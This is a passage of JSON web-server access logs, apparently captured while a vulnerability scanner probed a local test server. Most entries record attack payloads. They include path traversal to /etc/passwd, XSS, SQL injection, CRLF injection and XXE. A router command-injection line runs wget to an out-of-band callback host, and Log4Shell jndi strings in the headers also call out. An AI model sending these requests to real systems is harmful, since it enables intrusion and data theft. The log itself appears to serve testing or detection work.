"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/workreap-temp/29N5Eh8LkzLJz0Nmr9lde3DDnsb.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios4/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?g=g&m=Door&a=index&content= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/29N5EhMI2rfM6wNo6cZzGsSqKjY.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @ca2tuc8smpv1g2s80ca0uz854t195ir7h.oast.pro/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://ca2tuc8smpv1g2s80ca01x7om6a99jszj.oast.pro)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ca2tuc8smpv1g2s80ca0m6jqu3iw1j6dq.oast.pro:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /showfile.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.ca2tuc8smpv1g2s80ca0row39dk4ckqa3.oast.pro}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.ca2tuc8smpv1g2s80ca0btqs4o6wdktye.oast.pro}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.ca2tuc8smpv1g2s80ca01wq55muk5q6pe.oast.pro}"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} 